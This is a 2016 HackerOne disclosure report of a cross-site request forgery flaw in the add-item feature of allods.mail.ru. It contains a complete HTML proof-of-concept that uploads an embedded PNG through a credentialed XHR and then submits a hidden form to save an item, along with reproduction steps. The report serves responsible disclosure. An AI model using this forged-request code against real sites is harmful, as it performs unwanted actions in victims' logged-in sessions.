Mail.ru: [allods.mail.ru] Cross-Site Request Forgery (Add-Item)

2016-10-26T15:43:11
ID H1:178241
Type hackerone
Reporter ahsan
Modified 2017-03-17T13:07:39

Description

Hi,

I found that there is no anti-csrf while adding an item for '/media.php' in allods.mail.ru, from 'https://allods.mail.ru/media.php?do=additem&section=2' since there was no anti-csrf token, there was still an extra layer of security for csrf which I had to bypass!

More Details: The upload picture, and the submit form was in different pages for extra-protection for CSRF, I had to bypass it by first loading the picture and then submiting the form to add the item.

That's why I've created a more specific PoC in HTML, so you won't have any problems in reproducing the vulnerability.

PoC

Exploit Code:

`` &lt;html&gt; &lt;head&gt;&lt;title&gt;MailRu CSRF PoC&lt;/title&gt;&lt;/head&gt; &lt;body&gt; &lt;center&gt; &lt;h1&gt;Full CSRF PoC For allods.mail.ru Add-Item CSRF&lt;/h1&gt; &lt;!-- Since the upload picture, and the submit form was in different pages for extra-protection for CSRF, I had to bypass it by First loading the picture and then submiting the form to add the item. --&gt; &lt;br&gt; &lt;hr&gt; &lt;h2&gt;First click the button below:&lt;/h2&gt;&lt;br&gt; &lt;script&gt; function submitRequest() { var xhr = new XMLHttpRequest(); xhr.open("POST", "https://allods.mail.ru/mediafile.php", true); xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"); xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5"); xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------149631704917378"); xhr.withCredentials = true; var body = "-----------------------------149631704917378\r\n" + "Content-Disposition: form-data; name=\"do\"\r\n" + "\r\n" + "doadd\r\n" + "-----------------------------149631704917378\r\n" + "Content-Disposition: form-data; name=\"section\"\r\n" + "\r\n" + "2\r\n" + "-----------------------------149631704917378\r\n" + "Content-Disposition: form-data; name=\"item\"\r\n" + "\r\n" + "\r\n" + "-----------------------------149631704917378\r\n" + "Content-Disposition: form-data; name=\"asmain\"\r\n" + "\r\n" + "1\r\n" + "-----------------------------149631704917378\r\n" + "Content-Disposition: form-data; name=\"aspreview\"\r\n" + "\r\n" + "\r\n" + "-----------------------------149631704917378\r\n" + "Content-Disposition: form-data; name=\"ufile\"; filename=\"index.png\"\r\n" + "Content-Type: image/png\r\n" + "\r\n" + "\x89PNG\r\n" + "\x1a\n" + "\x00\x00\x00\rIHDR\x00\x00\x00\xe1\x00\x00\x00\xe1\x08\x03\x00\x00\x00\tm\"H\x00\x00\x00\x81PLTE\xcc33\xff\xff\xff\xc8\t\t\xcb//\xcb\"\"\xfb\xee\xee\xeb\xb4\xb4\xcb**\xe1\x8f\x8f\xd1FF\xc8\x18\x18\xcb--\xcb..\xc9 \xc8\x12\x12\xcb++\xfe\xf9\xf9\xcf??\xf7\xe2\xe2\xf6\xdc\xdc\xec\xba\xba\xf3\xd4\xd4\xd9ll\xd5ZZ\xcf;;\xde\x84\x84\xef\xc3\xc3\xe7\xac\xac\xd9jj\xe7\xa7\xa7\xd1KK\xfa\xea\xea\xe4\x99\x99\xd3RR\xd7bb\xc7\x03\x03\xd1CC\xea\xb8\xb8\xe3\x9e\x9e\xdd}}\xf1\xca\xca\xdf\x88\x88\xd4YY\xf6Z}\xa9\x00\x00\x0b\xa8IDATx\x9c\xd5\xddk\x9b\xaa6\x10\x00\xe0\x04\xf0\xe4\x88\x12\xf0\x86\xa2{Q\x8f\xee\xea\xfe\xff\x1f\xd8\x80\xba\xa2B2If\xd0\xce\xa7\xf6iK}\x0f\x90\x1b\x99\t\xe3\xe4\x91M\x96\xfb\xd5\xba\xc8\x7f6\x1f\xbb\xd1\x82-F\xfd\x8f\xcdO^\xacW\xfb\xe5$\xa3\xff\xdf3\xca\x8bO\x96_o\xbbX\xc6I\x14\x89t\x10\x86!;\x85\xfa\xabA*\xa2(Q\xffl\xf7\xf6\xb5\x1cS\xfe\x08*\xe1xZ\xf4KZzQ\xb5E\x98\x96\xd0~1\xa5bR\x08\'\xab\x3c\x89\x13a\xb2\xdd8\x85\xfa/\xf2\xd5\x84\xe0\xd7\x0b\xb3e!\xe2(\xb5\xc0]#\x8dbQ,\xb1_MTa\xb6\x9f\x07v\xf7\xae\xe1^\x06\xdb=\x12O\x98M\xb7A2\xf0\xd0]b\xa0\x90S\x3c$\x96p\xf6-Qx\x17\xa4\xfc\x9e!\xfd2\x14a\xb6Z\xc4\x02\x8dw\n" + "\x11/V(7\x12A\xf8y\x94\x91\xcf\xbb\xd7\x16a$\x8f\x9f/ \x9c\xe5\x01\xf6\xed\xbb\x86\x08r\xef\x87\xd5S8\xdbH\xb7\x9e\x01\x1a\xa9\xdcx\x1a\xbd\x84\x93\x1f9$\xf5\x951\x94s/\xa3\x87p\xbc\x95x\xad\xa7.\x06r\xeb1\xa4s\x16fE@\xfb|\xd6#\r\n" + "\xe7v\xd5U\xf8.\xe9\xda\x97\xa6\x10\xf2\xbdS\xe1\x8c%\x9d\xfa\xcaH\x98\xdb\xeb\xe8\"\xcc\xbe\x03\x8a\xfe\xcf\x14a\xf0\xdd\x91p\x99t\xfb\x80^C$\xcb\x0e\x84\xd9\x9b|\xc6\r\x3cE(s\xeb\x16\xc7V8\x8b\x9eu\x03O!\"\xdb\xb7\xd1Rx|\xca\x1bX\x8f0\xf8K(\xec\x8d\xa2\'\xfb\xca\x88v=\xe1\xa1\x831\x1a$\x86\xf2@#\\x07\xcf\xa6\xfdF\xb0\xa6\x10n\xbb\xef\xe4\xdb#\xd9\xa2\x0b{\x8b\xe7\xb6\xa1\xf7!\x16\xd0\x97\x11(\x1c\xc7\xaf\xf1\n" + "^c\x98\x00\xe7\x1b0\xe1\xe1\xe9\x9d\xc4c\x84\x01\xac\xbd\x01\tW\xff\x9e\xcdi\x8c\x7f\x7f\xb0\x84\xef\xf2\xd9\x96\x96\x08 3\x80p\xfd\xaa@\xc6$\xa0\xd70\x0b\xff\xc6\xcfvh\"6\x0f\xe1\x8c\xc2\x97\x06B\x88&\xe1\xfa\xb5\x81\x8ahzP\r\xc2\x97md\xaeaZ\xc0\xd1\x0bW\xaf\x0fT-\xaa\xbe\xd3\xd0\n" + "\x0f\xaf\xd9\x0f\xde\xc7?m\xd7\xaf\x13\x8e\xff\x1f@u\x17u\x038\x8d\xb0\x17\xbf\xdeP\xad9\xc2X3\x0c\xd7\x08\x17\xaf6\xd8n\x8f\xe1\xc8E\xb8\x05N\x97ho4\xf0\xea\xa2}\xbe\xd8\\x03\'\xbc\xe9\x88rf\x9c\x8c\x80\x1fG\x92\xd6n\xb1Mx\x00.Y\x88\x3e\xffC\xb7\xba\xa1:\x82\x3e\xf0Qj\x9dK\xb5\x08{\xc0\x8eP\x019\x1d\xb1\xea\xe9\xa0D\xd9\xd2\xda\xb4\x08G\xb0V\xa6\x02\x92\x11\xcf]9\x908\xec\xdb\x08\x8f\xb0uQq\xb9(\t\xf1w\xac\x02$F\xcd\x83\xf0F\xe1\x0c\xf6\x83\xc5\xf5O\x8d\x80X\x1b\x8c\x01\x89A\xe3\x82\x7f\x930\x83m\x1e\x11\xf5\xc7\x02\x9dx3\xda\x84\x11\xc3\xa8\xe9\xb3M\x93\xf0\rt=q\xfb\xdc#\x13\xef\x86\xd30\xa2\xc8a\xc2%\xa8\x1d\x15\xf7/6\xf1a\xbe\x00#\xca\x86\xef\x8b\x8f\xc2,\x81\x3c\xa3\x0f@Tb\xc3\x84\x08D\x0c#\x88\xf0\x1br\xa9\x06 \"\xb1q\xc6\x07\"\x8a\xc7\x0f\xe1\x0f\xc2\x19\xe4\x19m\x04\xa2\x11[\xa6\xb4 \xe2c{\xfa \x84\x8cu[\x80H\xc4\xd69;\x84\x18\x3e\x82\xee\xfe\xfe\x1d0\x8en\x05\xa2\x105\x8b\x12\x10br\xbfls\'\xcc\x00\xcf\xa8\x06\x88@\xd4\xae\xba@\x88\xf2\xaeS\xbc\x13\x02\x9a\x19-\xd0\x9bhXV\x02\x10E\xa1\x13\x8e\xcd?\xcf\x00\xf4$\x1a\x80 \xe2\xdd\xaa\xcd\xadpk\xdclh\x04z\x11\x8d@\x081\xbd\x9d\xef\xdf\x08\'\xc6\xb7\x10\x00\xf4 \x02\x80\x10\xa2\xbcIL\xb9\x11\xfe\x98n!\x08\xe8L\x04\x01\x01\xc4\xc1\xbcMh\xec\xec\x81@G\"\x10\x08 \xcaz\xb7_\x17n\x0c\x13{0\xd0\x89\x08\x06\x9a\x89\xc3M\xb3\xd0t\x0b-\x80\x0eD\x0b\xa0\x99X\xbf\x895a\xae_\xb8\xb3\x02Z\x13\xad\x80FbZ\x9b(^\x85\x9f\xfa\x9f\x14~X\xfd\x04K\xa2%\x90\xf3\x0f\xfd\xf09\xb8\xa6\xa2\\x85G\xfd\x1fKl\xbd]\xde\x82h\r\xe4c\xfd\x97[q|\x14\x9aF\xa4ad\xb5#\xd0\x8ah\x0f\xec\x99r\x00\xaf\xa3\xd3_\xe1\xca\xb4\x80HGt\x00\x1a\xd7\xca\xa2\xd5\x83pa\x9c\x17R\x11)\x80,\\xdc\x0bg\x80\x1d\t4D\x12\xa0j7.\x1d\xc6E\x08Z\x9d\xa1 \x12\x01\xaf\x93\xa8\xb3\x102\xf3%!R\x01U[s+\x9c\x02?\x02b\x13\xe9\x80,\x99\xde\x08\xcd\x13C\x12\"!\x90\r\xb6ua\x06\xef\x9c1\x89\x94@u\xf5\xac&\xdc[|\xa9\xc6#\xd2\x02Y\xb2\xaf\t\xe76\xa9\x92XDb\xe0\xe51\xad\x84\x16\x0f)\x1e\x91\x1axyL+\xe1\xd2r;\x05\x06\x91\x1e\xc8N\x99n\x95\xb0\xb0\xcd4\xf0\'v\x00\x3cw\xfa\x95\xd0\xbeX\x87/\xb1\x0b \x0b\xc5E8q\xd8%\xebG\xec\x04\xa8\xc6\xa6\x93\xb3\xd08q\xc2&v\x04\x3cM\xa1J\xe1\x9bS\xda\xb9;\xb1+\xe0i\xb9\xa6\x14:nLs%v\x06T7\xf1$4,y\x13;\x04V\x8bK\x0c\x3e\xaf\xc0!\xc2Ryp\x80\xd5\xfc\x829\xf4\x86^D\xebr^\x1e\xc0\xaaGT\xc2\xbe\xc7\x1eX\x07b\x87@\x16\xf6+\xa1W\xc6\x015\xd1\x0bXM\xf4\x99S\x7f\xdf\x19\xd1\x13X65\xccz\xd8\xdd%\xd1\x17X\x0e\xbe\x19\xff\xf2M\xf0\xa5#z\x03Y\xf4\xa5\x84n#\x9a.\x88\xfe\xc0rT\xc3\xf8\xce?\x9d\x80\x86\x88\x00d\xe1N\t1\xd2\xef(\x88\x18@\xd5\xd4p\x06\\\x0b6\x04\x3e\x11\x07\xc8d\xc6\x3c;\x8bK\x13\x91\x80j\x8a\xc8|;\x8bK\xe0\x12\xb1\x80\xaa\xbb{\xac\x82,\x98D4 \x8b\xf6\xcci\x82\xdf\x18xD\x3c\xa0\x9a\xe6\xb35^E\x0f,\"\"\x90\x895+\x10+\xe7\xe1\x101\x81,-X\x8eY\xfb\x10\x83\x88\n" + "d\x83\x9c\xcdQ3$\xfd\x89\xb8@\x16\xce\xd9\x067\x07\xd4\x97\x88\x0cd\xe1\x86\x196\x17\xd9_\xd2\x8b\x88\rd\xe1\x07\xeb\xe3^\xd1\x8f\x88\x0ed\xca7\xc2\xbe\xa4\x07\x91\x00\xa8|\x0b\xf4k:\x13)\x80\x14\x3e\xe6J$\x012\"c\x18\xd9\x17\xe2\xfe\xa4\x01.\x08\xde\xc32\xecW\xb6\xf9\x1f\x9a*\x1c#\xfc\xb6\xb4\x0c\xfbo\x13\x9c*#\xbc\x8f\xde\x1f\x96\xe1\x04\xa4!\xaa\xfe\x10yLS\x86#\x90\x84\xa8\xc64\xb8\xe3\xd22\x9c\x81\x14D5.E\x9d[\x94\xe1\x01$ \xaa\xb9\x05\xe6\xfc\xb0\x0c/ \x3eQ\xcd\x0f\x11\xe7\xf8ex\x02\xd1\x89j\x8e\x8f\xb7NS\x867\x10\x9b\x18\xad\xf0\xd6\xda\xca@\x00\"\x13\xa3=\xdazi\x19(@\\b\xb2\xc4Z\xf3.\x03\t\x88J\x8c\'H\xdf-\xca@\x03b\x12e\x86\xf3\xed\xa9\x0cD \"1\xc6\xf9~X\x06*\x10\x8dX}?\xf4\xff\x06\\\x062\x10\x8bX}\x03\xfe\xc2\xe8.\xd0\x81H\xc4\xea;\x3eFwA\x00\xc4!V{1\x9c7\xee\x11\x03Q\x88\xd5~\x1a\xbf=Q\x84@\x0c\xa2\xf4\xde\xd7F\n" + "\xf4\'\x9e\xf7\xb5y\xecM$\x06z\x13\xcf{\x13\xdd\xf7\x97\x92\x03}\x89\xe7\xfd\xa5^M\r1\xd0\x93(O{\x84\xb9G\x87H\x0e\xf4#\x9e\xf7y\x9b\x8a)\xa0\x02{\x84I\xef\x0f\xf1\xbbW\xdfy\x9a\xef\x02L;$\xfe\xe6[\xb8N\x11\xddv\xddS\x96.\xb8\x8b\xdf\x9c\x19\x87\xbc\'w mu\x86\x9b\xb8\xe6=\xb9\xf5\x88\xeey\x13]\x11O\xc51\x9c\xf2\x0f\xfd\x80\x9d\x11k\xf9\x87\x969\xa4\xbe\xc0\xae\x88\xb5\x1cRx\xb2:\x0e\xb0\x1bb=\x0f\xd8*\x97\x1b\x03\xd8\t\xf1&\x97\xdb\xf21\xc5H\xce\xa2\'\xde\xe4\xe3\xdb=\xa68\xd9g\xd4\xc4\xf4\xa6\xa6\x82\xd5\xfc\x02+\xbd\x8e\x98xW\x17\xc3b]\x18/\x7f\x90\x96xW\xdb\x04V\x9f\x06\x17HK\xfc\xad(lSc\x08\x1bHJ|\xa81\x04\xa8\x13\x85\x0f$$\x3e\xd6\x89\x82M\xa1\xf0sx\xa9\x88\r\xb5\xbe m\rE\x922\x11\xb1\xa1^\x9b\xa9\xe6\x1e\x11\x90\x88\xd8Ts\xcfT7\x91.\x8f\x9e\xa4\x82XS\xddD\xd3r\r]\x1e=\x3e\xb1\xb9\xf6\xa5\xa1~i4\xa5\x02:\x11\xa7\xda\x86\xb1^I\x18\\\x83VX\x1c2l\tt!j\xb7\x01\r\x7fj\xff&\xbc\x8e0\xe0\xb8HW\xa0=Q\x7f\xeedk\x1daCA,+\xa2\xed\x96f;\xa2\x1e\xd8^\x0b\xdaTI\xd8\x82h\xbfg\xdb\x86h89TS\xcf\x9bo\xf5\xcd)\x98\xe8\xb2)\x1dN4\x00u5\xd9\x8du\xf5\x81D\xb7]\xf7P\xa2\xe9\xecWm]}\xe3\xca)\x88\xe8\x9aV\x00#\x9a\x80\xfa\xb3\x11\xcc\xa3S\x00\xd1=o\x02B4\x9e\xde\x1b\xeb\xcf\xb70\x9fQb$\xfa$\x86\x98\x89F\xa0\xe9\x8c\x12\xc093\x06\xa2_\xe6\x8b\x89h\x04\x9a\xcf\x99\x01\x9c\xb9\xa6%\xfa\xa6\xf6\xe8\x89\xe6\x03\xa6\x01g\x05\x01Vl4D\xff\xdc%\x1d\xd1\x0c\x84\x9c\xf7\xc4\xb9\xf9\xcc\xaeV\"J\xb1\x8eV\xa2\x19\x08;\xb3\x0br\xeeZ\x0b\x11\'\xfb\xac\x8d\x088\x03\x1dv\xee\x9a\x9a(\x9aW\x16\x1b\x89X\xe9u\xcdD\x00\x10zv\x1e\xe8\xfc\xc3\x06\"^\xfe\x13\x11\x00\x84\x9f\x7f\x08:\xc3\xf2\x81\x88\x99 \xf9H\x04\x00-\xce\xb0T\xd7\x03,-\xde\x11q3@\xef\x89\x10\xa0\xcd9\xa4\x9c\xef\x00g\xc9\xde\x10\xd1\xf3\xe8o\x88\x10\xa0\xddY\xb2\xb0\xf3\x80kD\xfc\x1c\xde:\x11\x02\xb4=\x0f\x18v\xa6\xf3/\x91\"I\xf9J\x04\x01m\xcft\x06\x9e\xcb}&\xd2da_\x88 \xa0\xfd\xb9\xdc\xc0\xb3\xd5+\"U\x9a\xf9\x89\x08\x02\x8a\xb7VG\xbb\x10vr\xb5\"R\x01OD\x10p8jgh\x84\xbd\x18\xf2\xcb\xe3\xbf\xd03\xec\x1d\"d x?\xeb\x05\n" + "!\xa7!\xaap\xdb\x14\x07\x8c\x10\xf4i:\xd0\x9d\xd4\xa4\x13\xf2\x03M\x11\x00\xec\xf8\xd7\xd6\x8c\x9a\x85T\xc7\xc2\xe3\x86\xe1\x93\x91^\xc8\xdf\xd1r\xf7\xc8B\xde/\xcc\xd8\t\xf9\x1a/\x01\x93&b\xd3\x17#\x93\x10\xd6Z?/\xcc\xab\x9bF\xe1k\x13\x01\xcb\xb7f!_\xbf\xee\xbb(\x01\x1f5\x01B\xfe\xfe\xaa-jhd\xc0B\xaa\xe28\xbe\x01+\xf3\x03\x12\xaa\xb9\x14\xe5\xc0\xc5-\xc2\xd6\xf9\x92\x8b\x90\x8f\x13\xc80\xbc\xcb\x18&\xc0C5\x81B\xde[\xe0V\x08\xf1\r\xb1\x80~O\x85\n" + "\xd5|\x11\xb1\xbc\x84w$[\xf3\x0f\xb6\x16\xf2\xf5\xeb4\xa9\x81\xc5\xd6\x17\x0b!?\xc8\xd7x\x19\x87\x12\xd6\xc6\xd8\x0byo\x87Z\xcc\xc61\xa2\xbe\xd5\xde\x1b+\xa1\x1a\xc2=\xbd\xdb\x08\x03\xbb\x9dK\xb6B\x3e\x8b\x9e\xdb\xa6\x8a\xa8q\xe9\x1eQ\xc8\xb3\\x3e\xef6\x862\xd7\xac\xc8 \t9_\x3e\xed6\x8a\xa8\xe1\xfb \x81\x90\xf3\xef\xa7\xbc\x8da\xf0\xf8\t\x9bJ\xc8g\xac\xfb\xee?a\xb6o\xa0\x8f\xb0\\xc0\xe9\xf6Q\x15\xa6\xe5\x18t!\xcf\x8a\x00\xb9Z\x9f&\xd2\xa0\xb0na\xbc\x85j\xbe\xb1\x95\xd85\x17\x9bc \xb7\xc0y\x04\xb2\x90\xf3\xc9\xbc\x83q\xdcP\xce\xadO2C\x13\xaa&g#i\x9f\xd5T\xfe\xb850XBe\xcc\x03\xba6G\x04\xb9\xa7\x0fA\xc8\xf9\xe7Q\x12}!\x95G\xfb\x92\xd2\x14B\xd5\xae\xae\x161\xf6\x8d\x14\xf1b\xe5\xdc~\xd6\x03E\xa8bV\xc8\x04\xafeM\x13\xf9\xed\xfdx\x9e\x03K\xa8n\xe4t\x1b\xa0 \x07I\xb0\x9d\xa2\xdc\xbe\xf0\x84*\xb2\xbdBz}1\r\x05.\x8f#\x0bUd\xcbB\xc4\x91[\x0f\x92F\xb18.Qy\x1c_X\xc6d\x95G\xb1\xdd\xbdT\xf7NF\xf9\xcac\xe8\xd2\x1a\x14\xc22\xc6\xd3\xa2/\xe3$J\x8d9\xa4i\x94\xc4\xb2_L)teP\t\xab\x18/\xbf\xf2]\B#\x91\x0e\xc2\xf0\xb7zK\x18\x0eR\x11\x95\xb4x\x97\x7f-\xa9pU\x90\n" + "O\x91M\x0e\xfb\xd5\xba\xc8\xe7\x9b\x8f\xfeh\xc1\x16\xa3\xfe\xc7f\x9e\x17\xeb\xd5\xfe0\xc1~\xe9\x1a\xe2?\xe3\xb2\xb5\xb4E6aI\x00\x00\x00\x00IEND\xaeB`\x82\r\n" + "-----------------------------149631704917378--\r\n"; var aBody = new Uint8Array(body.length); for (var i = 0; i < aBody.length; i++) aBody[i] = body.charCodeAt(i); xhr.send(new Blob([aBody])); } </script> <form action="#"> <input type="button" value="Submit request" onclick="submitRequest();" /> </form> <br> <hr> <h2>Now click on this button:</h2><br> <form action="https://allods.mail.ru/media.php" method="POST" enctype="multipart/form-data"> <input type="hidden" name="do" value="saveitem" /> <input type="hidden" name="section" value="2" /> <input type="hidden" name="title" value="test" /> <input type="hidden" name="description" value="test" /> <input type="submit" value="Submit request" /> </form>

&lt;/center&gt;

</body>
</html> ```

Steps to Reproduce:

  • Login to your allods.mail.ru account
  • Save the above exploit code in .html file and open it locally in the browser where you are logged in
  • Click on the first button
  • Click on the second button
  • An item will be added and you will be redirected here: https://allods.mail.ru/media.php?do=myitems&section=2, now you can see the added item here ..

If you need any more information, let me know! :-)

Regards, Ahsan